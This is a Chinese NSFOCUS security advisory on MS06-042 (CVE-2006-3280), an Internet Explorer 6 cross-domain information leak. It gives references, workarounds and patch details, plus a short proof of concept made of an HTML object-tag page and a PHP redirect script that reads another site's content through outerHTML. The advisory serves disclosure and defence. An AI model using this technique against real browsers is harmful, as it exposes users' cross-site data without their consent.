首页 -> 安全研究

安全研究

安全漏洞
Microsoft Internet Explorer OuterHTML重新定向信息泄漏漏洞(MS06-042)

发布日期:2006-06-27
更新日期:2006-08-10

受影响系统:
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ  ID: 18682
CVE(CAN) ID: CVE-2006-3280

Internet Explorer是微软发布的非常流行的WEB浏览器。

Microsoft Internet Explorer中存在跨域漏洞。攻击者可以创建特制的对象标签,该标签的数据参数引用了攻击者站点的链接,而这个站点将Location HTTP首部指定为目标站点,这样就可以通过对象的outerHTML属性读取敏感信息。

<*来源:Plebo Aesdi Nael (plebo@gmx.net
  
  链接:http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060627/3d930eda/PLEBO-2006.06.16-IE
        http://secunia.com/advisories/20825/print/
        http://www.kb.cert.org/vuls/id/883108
        http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx
        http://www.us-cert.gov/cas/techalerts/TA06-220A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

------------------------- i.html -------------------------
<html><body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)">
<object width=100 height=100 data=r.php?http://www.google.com/123456789 type=text/html id=o></object>
</body></html>
------------------------- r.php -------------------------
<?php header("Location: ".$_SERVER["QUERY_STRING"]); ?>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 禁止在Internet Explorer中缓存Web内容。
* 配置Internet Explorer在运行活动脚本之前要求提示,或在Internet和本地intranet安全区中禁用活动脚本。
* 将Internet和本地intranet安全区设置为“高”以在运行ActiveX控件和活动脚本之前要求提示。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-042)以及相应补丁:
MS06-042:Cumulative Security Update for Internet Explorer (918899)
链接:http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx

浏览次数:3581
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障